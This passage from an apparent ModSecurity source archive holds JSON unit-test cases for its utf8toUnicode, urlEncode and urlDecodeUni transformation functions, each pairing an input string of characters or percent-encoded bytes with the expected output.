%u00db%u00a9 %u00db%u00ae %u00db%u00af %u00db%u00b0 %u00db%u00b1 %u00db%u00b2 %u00db%u00b3 %u00db%u00b4 %u00db%u00b5 %u00db%u00b6 %u00db%u00b7 %u00db%u00b8 %u00db%u00b9 %u00db%u00ba %u00db%u00bb %u00db%u00bc %u00db%u00bd %u00db%u00be " }, { "output" : "%u00e2%u0096%u00a0 %u00e2%u0096%u00a1 %u00e2%u0096%u00a2 %u00e2%u0096%u00a3 %u00e2%u0096%u00a4 %u00e2%u0096%u00a5 %u00e2%u0096%u00a6 %u00e2%u0096%u00a7 %u00e2%u0096%u00a8 %u00e2%u0096%u00a9 %u00e2%u0096%u00aa %u00e2%u0096%u00ab %u00e2%u0096%u00ac %u00e2%u0096%u00ad %u00e2%u0096%u00ae %u00e2%u0096%u00af %u00e2%u0096%u00b0 %u00e2%u0096%u00b1 %u00e2%u0096%u00b2 %u00e2%u0096%u00b3 %u00e2%u0096%u00b4 %u00e2%u0096%u00b5 %u00e2%u0096%u00b6 %u00e2%u0096%u00b7 %u00e2%u0096%u00b8 %u00e2%u0096%u00b9 %u00e2%u0096%u00ba %u00e2%u0096%u00bb %u00e2%u0096%u00bc %u00e2%u0096%u00bd %u00e2%u0096%u00be %u00e2%u0096%u00bf %u00e2%u0097%u0080 %u00e2%u0097%u0081 %u00e2%u0097%u0082 %u00e2%u0097%u0083 %u00e2%u0097%u0084 %u00e2%u0097%u0085 %u00e2%u0097%u0086 %u00e2%u0097%u0087 %u00e2%u0097%u0088 %u00e2%u0097%u0089 %u00e2%u0097%u008a %u00e2%u0097%u008b %u00e2%u0097%u008c %u00e2%u0097%u008d %u00e2%u0097%u008e %u00e2%u0097%u008f %u00e2%u0097%u0090 %u00e2%u0097%u0091 %u00e2%u0097%u0092 %u00e2%u0097%u0093 %u00e2%u0097%u0094 %u00e2%u0097%u0095 %u00e2%u0097%u0096 %u00e2%u0097%u0097 %u00e2%u0097%u0098 %u00e2%u0097%u0099 %u00e2%u0097%u009a %u00e2%u0097%u009b %u00e2%u0097%u009c %u00e2%u0097%u009d %u00e2%u0097%u009e %u00e2%u0097%u009f %u00e2%u0097%u00a0 %u00e2%u0097%u00a1 %u00e2%u0097%u00a2 %u00e2%u0097%u00a3 %u00e2%u0097%u00a4 %u00e2%u0097%u00a5 %u00e2%u0097%u00a6 %u00e2%u0097%u00a7 %u00e2%u0097%u00a8 %u00e2%u0097%u00a9 %u00e2%u0097%u00aa %u00e2%u0097%u00ab %u00e2%u0097%u00ac %u00e2%u0097%u00ad %u00e2%u0097%u00ae %u00e2%u0097%u00af %u00e2%u0097%u00b0 %u00e2%u0097%u00b1 %u00e2%u0097%u00b2 %u00e2%u0097%u00b3 %u00e2%u0097%u00b4 %u00e2%u0097%u00b5 %u00e2%u0097%u00b6 %u00e2%u0097%u00b7 %u00e2%u0097%u00b8 %u00e2%u0097%u00b9 %u00e2%u0097%u00ba %u00e2%u0097%u00bb %u00e2%u0097%u00bc %u00e2%u0097%u00bd %u00e2%u0097%u00be %u00e2%u0097%u00bf", "input" : "■ □ ▢ ▣ ▤ ▥ ▦ ▧ ▨ ▩ ▪ ▫ ▬ ▭ ▮ ▯ ▰ ▱ ▲ △ ▴ ▵ ▶ ▷ ▸ ▹ ► ▻ ▼ ▽ ▾ ▿ ◀ ◁ ◂ ◃ ◄ ◅ ◆ ◇ ◈ ◉ ◊ ○ ◌ ◍ ◎ ● ◐ ◑ ◒ ◓ ◔ ◕ ◖ ◗ ◘ ◙ ◚ ◛ ◜ ◝ ◞ ◟ ◠ ◡ ◢ ◣ ◤ ◥ ◦ ◧ ◨ ◩ ◪ ◫ ◬ ◭ ◮ ◯ ◰ ◱ ◲ ◳ ◴ ◵ ◶ ◷ ◸ ◹ ◺ ◻ ◼ ◽ ◾ ◿", "name" : "utf8toUnicode", "type" : "tfn", "ret" : 1 }, { "name" : "utf8toUnicode", "input" : " ✁ ✂ ✃ ✄ ✅ ✆ ✇ ✈ ✉ ✊ ✋ ✌ ✍ ✎ ✏ ✐ ✑ ✒ ✓ ✔ ✕ ✖ ✗ ✘ ✙ ✚ ✛ ✜ ✝ ✞ ✟ ✠ ✡ ✢ ✣ ✤ ✥ ✦ ✧ ✨ ✩ ✪ ✫ ✬ ✭ ✮ ✯ ✰ ✱ ✲ ✳ ✴ ✵ ✶ ✷ ✸ ✹ ✺ ✻ ✼ ✽ ✾ ✿ ❀ ❁ ❂ ❃ ❄ ❅ ❆ ❇ ❈ ❉ ❊ ❋ ❌ ❍ ❎ ❏ ❐ ❑ ❒ ❓ ❔ ❕ ❖ ❗ ❘ ❙ ❚ ❛ ❜ ❝ ❣ ❤ ❥ ❦ ❧ ❨ ❩ ❪ ❫ ❬ ❭ ❮ ❯ ❰ ❱ ❲ ❳ ❴ ❵ ❶ ❷ ❸ ❹ ❺ ❻ ❼ ❽ ❾ ❿ ➀ ➁ ➂ ➃ ➄ ➅ ➆ ➇ ➈ ➉ ➊ ➋ ➌ ➍ ➎ ➏ ➐ ➑ ➒ ➓ ➔ ➘ ➙ ➚ ➛ ➜ ➝ ➞ ➟ ➠ ➡ ➢ ➣ ➤ ➥ ➦ ➧ ➨ ➩ ➪ ➫ ➬ ➭ ➮ ➯ ➰ ➱ ➲ ➳ ➴ ➵ ➶ ➷ ➸ ➹ ➺ ➻ ➼ ➽ ➾ ➿", "type" : "tfn", "ret" : 1, "output" : " %u00e2%u009c%u0081 %u00e2%u009c%u0082 %u00e2%u009c%u0083 %u00e2%u009c%u0084 %u00e2%u009c%u0085 %u00e2%u009c%u0086 %u00e2%u009c%u0087 %u00e2%u009c%u0088 %u00e2%u009c%u0089 %u00e2%u009c%u008a %u00e2%u009c%u008b %u00e2%u009c%u008c %u00e2%u009c%u008d %u00e2%u009c%u008e %u00e2%u009c%u008f %u00e2%u009c%u0090 %u00e2%u009c%u0091 %u00e2%u009c%u0092 %u00e2%u009c%u0093 %u00e2%u009c%u0094 %u00e2%u009c%u0095 %u00e2%u009c%u0096 %u00e2%u009c%u0097 %u00e2%u009c%u0098 %u00e2%u009c%u0099 %u00e2%u009c%u009a %u00e2%u009c%u009b %u00e2%u009c%u009c %u00e2%u009c%u009d %u00e2%u009c%u009e %u00e2%u009c%u009f %u00e2%u009c%u00a0 %u00e2%u009c%u00a1 %u00e2%u009c%u00a2 %u00e2%u009c%u00a3 %u00e2%u009c%u00a4 %u00e2%u009c%u00a5 %u00e2%u009c%u00a6 %u00e2%u009c%u00a7 %u00e2%u009c%u00a8 %u00e2%u009c%u00a9 %u00e2%u009c%u00aa %u00e2%u009c%u00ab %u00e2%u009c%u00ac %u00e2%u009c%u00ad %u00e2%u009c%u00ae %u00e2%u009c%u00af %u00e2%u009c%u00b0 %u00e2%u009c%u00b1 %u00e2%u009c%u00b2 %u00e2%u009c%u00b3 %u00e2%u009c%u00b4 %u00e2%u009c%u00b5 %u00e2%u009c%u00b6 %u00e2%u009c%u00b7 %u00e2%u009c%u00b8 %u00e2%u009c%u00b9 %u00e2%u009c%u00ba %u00e2%u009c%u00bb %u00e2%u009c%u00bc %u00e2%u009c%u00bd %u00e2%u009c%u00be %u00e2%u009c%u00bf %u00e2%u009d%u0080 %u00e2%u009d%u0081 %u00e2%u009d%u0082 %u00e2%u009d%u0083 %u00e2%u009d%u0084 %u00e2%u009d%u0085 %u00e2%u009d%u0086 %u00e2%u009d%u0087 %u00e2%u009d%u0088 %u00e2%u009d%u0089 %u00e2%u009d%u008a %u00e2%u009d%u008b %u00e2%u009d%u008c %u00e2%u009d%u008d %u00e2%u009d%u008e %u00e2%u009d%u008f %u00e2%u009d%u0090 %u00e2%u009d%u0091 %u00e2%u009d%u0092 %u00e2%u009d%u0093 %u00e2%u009d%u0094 %u00e2%u009d%u0095 %u00e2%u009d%u0096 %u00e2%u009d%u0097 %u00e2%u009d%u0098 %u00e2%u009d%u0099 %u00e2%u009d%u009a %u00e2%u009d%u009b %u00e2%u009d%u009c %u00e2%u009d%u009d %u00e2%u009d%u00a3 %u00e2%u009d%u00a4 %u00e2%u009d%u00a5 %u00e2%u009d%u00a6 %u00e2%u009d%u00a7 %u00e2%u009d%u00a8 %u00e2%u009d%u00a9 %u00e2%u009d%u00aa %u00e2%u009d%u00ab %u00e2%u009d%u00ac %u00e2%u009d%u00ad %u00e2%u009d%u00ae %u00e2%u009d%u00af %u00e2%u009d%u00b0 %u00e2%u009d%u00b1 %u00e2%u009d%u00b2 %u00e2%u009d%u00b3 %u00e2%u009d%u00b4 %u00e2%u009d%u00b5 %u00e2%u009d%u00b6 %u00e2%u009d%u00b7 %u00e2%u009d%u00b8 %u00e2%u009d%u00b9 %u00e2%u009d%u00ba %u00e2%u009d%u00bb %u00e2%u009d%u00bc %u00e2%u009d%u00bd %u00e2%u009d%u00be %u00e2%u009d%u00bf %u00e2%u009e%u0080 %u00e2%u009e%u0081 %u00e2%u009e%u0082 %u00e2%u009e%u0083 %u00e2%u009e%u0084 %u00e2%u009e%u0085 %u00e2%u009e%u0086 %u00e2%u009e%u0087 %u00e2%u009e%u0088 %u00e2%u009e%u0089 %u00e2%u009e%u008a %u00e2%u009e%u008b %u00e2%u009e%u008c %u00e2%u009e%u008d %u00e2%u009e%u008e %u00e2%u009e%u008f %u00e2%u009e%u0090 %u00e2%u009e%u0091 %u00e2%u009e%u0092 %u00e2%u009e%u0093 %u00e2%u009e%u0094 %u00e2%u009e%u0098 %u00e2%u009e%u0099 %u00e2%u009e%u009a %u00e2%u009e%u009b %u00e2%u009e%u009c %u00e2%u009e%u009d %u00e2%u009e%u009e %u00e2%u009e%u009f %u00e2%u009e%u00a0 %u00e2%u009e%u00a1 %u00e2%u009e%u00a2 %u00e2%u009e%u00a3 %u00e2%u009e%u00a4 %u00e2%u009e%u00a5 %u00e2%u009e%u00a6 %u00e2%u009e%u00a7 %u00e2%u009e%u00a8 %u00e2%u009e%u00a9 %u00e2%u009e%u00aa %u00e2%u009e%u00ab %u00e2%u009e%u00ac %u00e2%u009e%u00ad %u00e2%u009e%u00ae %u00e2%u009e%u00af %u00e2%u009e%u00b0 %u00e2%u009e%u00b1 %u00e2%u009e%u00b2 %u00e2%u009e%u00b3 %u00e2%u009e%u00b4 %u00e2%u009e%u00b5 %u00e2%u009e%u00b6 %u00e2%u009e%u00b7 %u00e2%u009e%u00b8 %u00e2%u009e%u00b9 %u00e2%u009e%u00ba %u00e2%u009e%u00bb %u00e2%u009e%u00bc %u00e2%u009e%u00bd %u00e2%u009e%u00be %u00e2%u009e%u00bf" }, { "ret" : 1, "name" : "utf8toUnicode", "input" : " ⟀ ⟁ ⟂ ⟃ ⟄ ⟅ ⟆ ⟇ ⟈ ⟉ ⟊ ⟌ ⟐ ⟑ ⟒ ⟓ ⟔ ⟕ ⟖ ⟗ ⟘ ⟙ ⟚ ⟛ ⟜ ⟝ ⟞ ⟟ ⟠ ⟡ ⟢ ⟣ ⟤ ⟥ ⟦ ⟧ ⟨ ⟩ ⟪ ⟫ ⟬ ⟭ ⟮ ⟯", "type" : "tfn", "output" : " %u00e2%u009f%u0080 %u00e2%u009f%u0081 %u00e2%u009f%u0082 %u00e2%u009f%u0083 %u00e2%u009f%u0084 %u00e2%u009f%u0085 %u00e2%u009f%u0086 %u00e2%u009f%u0087 %u00e2%u009f%u0088 %u00e2%u009f%u0089 %u00e2%u009f%u008a %u00e2%u009f%u008c %u00e2%u009f%u0090 %u00e2%u009f%u0091 %u00e2%u009f%u0092 %u00e2%u009f%u0093 %u00e2%u009f%u0094 %u00e2%u009f%u0095 %u00e2%u009f%u0096 %u00e2%u009f%u0097 %u00e2%u009f%u0098 %u00e2%u009f%u0099 %u00e2%u009f%u009a %u00e2%u009f%u009b %u00e2%u009f%u009c %u00e2%u009f%u009d %u00e2%u009f%u009e %u00e2%u009f%u009f %u00e2%u009f%u00a0 %u00e2%u009f%u00a1 %u00e2%u009f%u00a2 %u00e2%u009f%u00a3 %u00e2%u009f%u00a4 %u00e2%u009f%u00a5 %u00e2%u009f%u00a6 %u00e2%u009f%u00a7 %u00e2%u009f%u00a8 %u00e2%u009f%u00a9 %u00e2%u009f%u00aa %u00e2%u009f%u00ab %u00e2%u009f%u00ac %u00e2%u009f%u00ad %u00e2%u009f%u00ae %u00e2%u009f%u00af" }, { "type" : "tfn", "input" : " ⟰ ⟱ ⟲ ⟳ ⟴ ⟵ ⟶ ⟷ ⟸ ⟹ ⟺ ⟻ ⟼ ⟽ ⟾ ⟿", "name" : "utf8toUnicode", "ret" : 1, "output" : " %u00e2%u009f%u00b0 %u00e2%u009f%u00b1 %u00e2%u009f%u00b2 %u00e2%u009f%u00b3 %u00e2%u009f%u00b4 %u00e2%u009f%u00b5 %u00e2%u009f%u00b6 %u00e2%u009f%u00b7 %u00e2%u009f%u00b8 %u00e2%u009f%u00b9 %u00e2%u009f%u00ba %u00e2%u009f%u00bb %u00e2%u009f%u00bc %u00e2%u009f%u00bd %u00e2%u009f%u00be %u00e2%u009f%u00bf" }, { "input" : "Ā€ ā Ă ă Ą ą Ć ć Ĉ ĉ Ċ ċ Č č Ď ď Đ đ Ē ē Ĕ ĕ Ė ė Ę ę Ě ě Ĝ ĝ Ğ ğ Ä  Ä¡ Ä¢ Ä£ Ĥ Ä¥ Ħ ħ Ĩ Ä© Ī Ä« Ĭ Ä­ Ä® į İ ı IJ ij Ä´ ĵ Ķ Ä· ĸ Ĺ ĺ Ä» ļ Ľ ľ Ä¿ ŀ Ł ł Ń ń Ņ ņ Ň ň ʼn Ŋ ŋ Ō ō Ŏ ŏ Ő ő Œ œ Ŕ ŕ Ŗ ŗ Ř ř Ś ś Ŝ ŝ Ş ş Å  Å¡ Å¢ Å£ Ť Å¥ Ŧ ŧ Ũ Å© Ū Å« Ŭ Å­ Å® ů Ű ű Ų ų Å´ ŵ Ŷ Å· Ÿ Ź ź Å» ż Ž ž Å¿", "name" : "utf8toUnicode", "type" : "tfn", "ret" : 1, "output" : "%u0100%u0080 %u00c4%u0081 %u00c4%u0082 %u00c4%u0083 %u00c4%u0084 %u00c4%u0085 %u00c4%u0086 %u00c4%u0087 %u00c4%u0088 %u00c4%u0089 %u00c4%u008a %u00c4%u008b %u00c4%u008c %u00c4%u008d %u00c4%u008e %u00c4%u008f %u00c4%u0090 %u00c4%u0091 %u00c4%u0092 %u00c4%u0093 %u00c4%u0094 %u00c4%u0095 %u00c4%u0096 %u00c4%u0097 %u00c4%u0098 %u00c4%u0099 %u00c4%u009a %u00c4%u009b %u00c4%u009c %u00c4%u009d %u00c4%u009e %u00c4%u009f %u00c4%u00a0 %u00c4%u00a1 %u00c4%u00a2 %u00c4%u00a3 %u00c4%u00a4 %u00c4%u00a5 %u00c4%u00a6 %u00c4%u00a7 %u00c4%u00a8 %u00c4%u00a9 %u00c4%u00aa %u00c4%u00ab %u00c4%u00ac %u00c4%u00ad %u00c4%u00ae %u00c4%u00af %u00c4%u00b0 %u00c4%u00b1 %u00c4%u00b2 %u00c4%u00b3 %u00c4%u00b4 %u00c4%u00b5 %u00c4%u00b6 %u00c4%u00b7 %u00c4%u00b8 %u00c4%u00b9 %u00c4%u00ba %u00c4%u00bb %u00c4%u00bc %u00c4%u00bd %u00c4%u00be %u00c4%u00bf %u00c5%u0080 %u00c5%u0081 %u00c5%u0082 %u00c5%u0083 %u00c5%u0084 %u00c5%u0085 %u00c5%u0086 %u00c5%u0087 %u00c5%u0088 %u00c5%u0089 %u00c5%u008a %u00c5%u008b %u00c5%u008c %u00c5%u008d %u00c5%u008e %u00c5%u008f %u00c5%u0090 %u00c5%u0091 %u00c5%u0092 %u00c5%u0093 %u00c5%u0094 %u00c5%u0095 %u00c5%u0096 %u00c5%u0097 %u00c5%u0098 %u00c5%u0099 %u00c5%u009a %u00c5%u009b %u00c5%u009c %u00c5%u009d %u00c5%u009e %u00c5%u009f %u00c5%u00a0 %u00c5%u00a1 %u00c5%u00a2 %u00c5%u00a3 %u00c5%u00a4 %u00c5%u00a5 %u00c5%u00a6 %u00c5%u00a7 %u00c5%u00a8 %u00c5%u00a9 %u00c5%u00aa %u00c5%u00ab %u00c5%u00ac %u00c5%u00ad %u00c5%u00ae %u00c5%u00af %u00c5%u00b0 %u00c5%u00b1 %u00c5%u00b2 %u00c5%u00b3 %u00c5%u00b4 %u00c5%u00b5 %u00c5%u00b6 %u00c5%u00b7 %u00c5%u00b8 %u00c5%u00b9 %u00c5%u00ba %u00c5%u00bb %u00c5%u00bc %u00c5%u00bd %u00c5%u00be %u00c5%u00bf" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/urlEncode.json0000644000175000017500000001070013607066311032352 0ustar zimmerlezimmerle[ { "name" : "urlEncode", "input" : "", "type" : "tfn", "ret" : 0, "output" : "" }, { "output" : "TestCase", "type" : "tfn", "input" : "TestCase", "name" : "urlEncode", "ret" : 0 }, { "ret" : 1, "type" : "tfn", "input" : " \\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\b\t\n\\u000b\f\r\\u000e\\u000f\\u0010\\u0011\\u0012\\u0013\\u0014\\u0015\\u0016\\u0017\\u0018\\u0019\\u001a\\u001b\\u001c\\u001d\\u001e\\u001f", "name" : "urlEncode", "output" : "+%00%01%02%03%04%05%06%07%08%09%0a%0b%0c%0d%0e%0f%10%11%12%13%14%15%16%17%18%19%1a%1b%1c%1d%1e%1f" }, { "ret" : 1, "type" : "tfn", "input" : " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}", "name" : "urlEncode", "output" : "+%21%22%23%24%25%26%27%28%29*%2b%2c%2d%2e%2f0123456789%3a%3b%3c%3d%3e%3f%40ABCDEFGHIJKLMNOPQRSTUVWXYZ%5b%5c%5d%5e%5f%60abcdefghijklmnopqrstuvwxyz%7b%7c%7d" }, { "ret" : 1, "type" : "tfn", "input" : "ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", "name" : "urlEncode", "output" : "%c3%80%c3%81%c3%82%c3%83%c3%84%c3%85%c3%86%c3%87%c3%88%c3%89%c3%8a%c3%8b%c3%8c%c3%8d%c3%8e%c3%8f%c3%90%c3%91%c3%92%c3%93%c3%94%c3%95%c3%96%c3%97%c3%98%c3%99%c3%9a%c3%9b%c3%9c%c3%9d%c3%9e%c3%9f%c3%a0%c3%a1%c3%a2%c3%a3%c3%a4%c3%a5%c3%a6%c3%a7%c3%a8%c3%a9%c3%aa%c3%ab%c3%ac%c3%ad%c3%ae%c3%af%c3%b0%c3%b1%c3%b2%c3%b3%c3%b4%c3%b5%c3%b6%c3%b7%c3%b8%c3%b9%c3%ba%c3%bb%c3%bc%c3%bd%c3%be%c3%bf" }, { "ret" : 1, "type" : "tfn", "input" : " ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿", "name" : "urlEncode", "output" : "%c2%a0%c2%a1%c2%a2%c2%a3%c2%a4%c2%a5%c2%a6%c2%a7%c2%a8%c2%a9%c2%aa%c2%ab%c2%ac%c2%ad%c2%ae%c2%af%c2%b0%c2%b1%c2%b2%c2%b3%c2%b4%c2%b5%c2%b6%c2%b7%c2%b8%c2%b9%c2%ba%c2%bb%c2%bc%c2%bd%c2%be%c2%bf" }, { "ret" : 1, "type" : "tfn", "input" : "~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ", "name" : "urlEncode", "output" : "%7e%7f%c2%80%c2%81%c2%82%c2%83%c2%84%c2%85%c2%86%c2%87%c2%88%c2%89%c2%8a%c2%8b%c2%8c%c2%8d%c2%8e%c2%8f%c2%90%c2%91%c2%92%c2%93%c2%94%c2%95%c2%96%c2%97%c2%98%c2%99%c2%9a%c2%9b%c2%9c%c2%9d%c2%9e%c2%9f" }, { "output" : "Test+Case", "name" : "urlEncode", "input" : "Test Case", "type" : "tfn", "ret" : 1 }, { "input" : "% ", "type" : "tfn", "name" : "urlEncode", "ret" : 1, "output" : "%25+" }, { "output" : "%250g+", "ret" : 1, "input" : "%0g ", "name" : "urlEncode", "type" : "tfn" }, { "input" : "%0 ", "type" : "tfn", "name" : "urlEncode", "ret" : 1, "output" : "%250+" }, { "ret" : 1, "input" : "%g0 ", "type" : "tfn", "name" : "urlEncode", "output" : "%25g0+" }, { "output" : "%25g+", "type" : "tfn", "input" : "%g ", "name" : "urlEncode", "ret" : 1 }, { "output" : "%250%251%252%253%254%255%256%257%258%259%250%25a%25b%25c%25d%25e%25f", "input" : "%0%1%2%3%4%5%6%7%8%9%0%a%b%c%d%e%f", "name" : "urlEncode", "type" : "tfn", "ret" : 1 }, { "output" : "%25g0%25g1%25g2%25g3%25g4%25g5%25g6%25g7%25g8%25g9%25g0%25ga%25gb%25gc%25gd%25ge%25gf", "ret" : 1, "input" : "%g0%g1%g2%g3%g4%g5%g6%g7%g8%g9%g0%ga%gb%gc%gd%ge%gf", "name" : "urlEncode", "type" : "tfn" }, { "ret" : 1, "type" : "tfn", "input" : "%0g%1g%2g%3g%4g%5g%6g%7g%8g%9g%0g%ag%bg%cg%dg%eg%fg", "name" : "urlEncode", "output" : "%250g%251g%252g%253g%254g%255g%256g%257g%258g%259g%250g%25ag%25bg%25cg%25dg%25eg%25fg" }, { "output" : "%25", "input" : "%", "name" : "urlEncode", "type" : "tfn", "ret" : 1 }, { "type" : "tfn", "input" : "%0", "name" : "urlEncode", "ret" : 1, "output" : "%250" }, { "output" : "%25%25", "input" : "%%", "type" : "tfn", "name" : "urlEncode", "ret" : 1 }, { "ret" : 1, "input" : "%0g", "type" : "tfn", "name" : "urlEncode", "output" : "%250g" }, { "output" : "%25gg", "type" : "tfn", "input" : "%gg", "name" : "urlEncode", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/urlDecodeUni.json0000644000175000017500000003431213607066311033021 0ustar zimmerlezimmerle[ { "output" : "", "ret" : 0, "type" : "tfn", "input" : "", "name" : "urlDecodeUni" }, { "output" : "TestCase", "type" : "tfn", "input" : "TestCase", "name" : "urlDecodeUni", "ret" : 0 }, { "output" : "Test\\u0000Case", "name" : "urlDecodeUni", "input" : "Test\\u0000Case", "type" : "tfn", "ret" : 0 }, { "output" : " \\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f \\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff", "name" : "urlDecodeUni", "input" : "+%00%01%02%03%04%05%06%07%08%09%0a%0b%0c%0d%0e%0f%10%11%12%13%14%15%16%17%18%19%1a%1b%1c%1d%1e%1f%20%21%22%23%24%25%26%27%28%29%2a%2b%2c%2d%2e%2f%30%31%32%33%34%35%36%37%38%39%3a%3b%3c%3d%3e%3f%40%41%42%43%44%45%46%47%48%49%4a%4b%4c%4d%4e%4f%50%51%52%53%54%55%56%57%58%59%5a%5b%5c%5d%5e%5f%60%61%62%63%64%65%66%67%68%69%6a%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%7b%7c%7d%7e%7f%80%81%82%83%84%85%86%87%88%89%8a%8b%8c%8d%8e%8f%90%91%92%93%94%95%96%97%98%99%9a%9b%9c%9d%9e%9f%a0%a1%a2%a3%a4%a5%a6%a7%a8%a9%aa%ab%ac%ad%ae%af%b0%b1%b2%b3%b4%b5%b6%b7%b8%b9%ba%bb%bc%bd%be%bf%c0%c1%c2%c3%c4%c5%c6%c7%c8%c9%ca%cb%cc%cd%ce%cf%d0%d1%d2%d3%d4%d5%d6%d7%d8%d9%da%db%dc%dd%de%df%e0%e1%e2%e3%e4%e5%e6%e7%e8%e9%ea%eb%ec%ed%ee%ef%f0%f1%f2%f3%f4%f5%f6%f7%f8%f9%fa%fb%fc%fd%fe%ff", "type" : "tfn", "ret" : 1 }, { "output" : "Test Case", "input" : "Test+Case", "name" : "urlDecodeUni", "type" : "tfn", "ret" : 1 }, { "ret" : 1, "type" : "tfn", "input" : "+%u0000%u0001%u0002%u0003%u0004%u0005%u0006%u0007%u0008%u0009%u000a%u000b%u000c%u000d%u000e%u000f%u0010%u0011%u0012%u0013%u0014%u0015%u0016%u0017%u0018%u0019%u001a%u001b%u001c%u001d%u001e%u001f%u0020%u0021%u0022%u0023%u0024%u0025%u0026%u0027%u0028%u0029%u002a%u002b%u002c%u002d%u002e%u002f%u0030%u0031%u0032%u0033%u0034%u0035%u0036%u0037%u0038%u0039%u003a%u003b%u003c%u003d%u003e%u003f%u0040%u0041%u0042%u0043%u0044%u0045%u0046%u0047%u0048%u0049%u004a%u004b%u004c%u004d%u004e%u004f%u0050%u0051%u0052%u0053%u0054%u0055%u0056%u0057%u0058%u0059%u005a%u005b%u005c%u005d%u005e%u005f%u0060%u0061%u0062%u0063%u0064%u0065%u0066%u0067%u0068%u0069%u006a%u006b%u006c%u006d%u006e%u006f%u0070%u0071%u0072%u0073%u0074%u0075%u0076%u0077%u0078%u0079%u007a%u007b%u007c%u007d%u007e%u007f%u0080%u0081%u0082%u0083%u0084%u0085%u0086%u0087%u0088%u0089%u008a%u008b%u008c%u008d%u008e%u008f%u0090%u0091%u0092%u0093%u0094%u0095%u0096%u0097%u0098%u0099%u009a%u009b%u009c%u009d%u009e%u009f%u00a0%u00a1%u00a2%u00a3%u00a4%u00a5%u00a6%u00a7%u00a8%u00a9%u00aa%u00ab%u00ac%u00ad%u00ae%u00af%u00b0%u00b1%u00b2%u00b3%u00b4%u00b5%u00b6%u00b7%u00b8%u00b9%u00ba%u00bb%u00bc%u00bd%u00be%u00bf%u00c0%u00c1%u00c2%u00c3%u00c4%u00c5%u00c6%u00c7%u00c8%u00c9%u00ca%u00cb%u00cc%u00cd%u00ce%u00cf%u00d0%u00d1%u00d2%u00d3%u00d4%u00d5%u00d6%u00d7%u00d8%u00d9%u00da%u00db%u00dc%u00dd%u00de%u00df%u00e0%u00e1%u00e2%u00e3%u00e4%u00e5%u00e6%u00e7%u00e8%u00e9%u00ea%u00eb%u00ec%u00ed%u00ee%u00ef%u00f0%u00f1%u00f2%u00f3%u00f4%u00f5%u00f6%u00f7%u00f8%u00f9%u00fa%u00fb%u00fc%u00fd%u00fe%u00ff", "name" : "urlDecodeUni", "output" : " \\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f 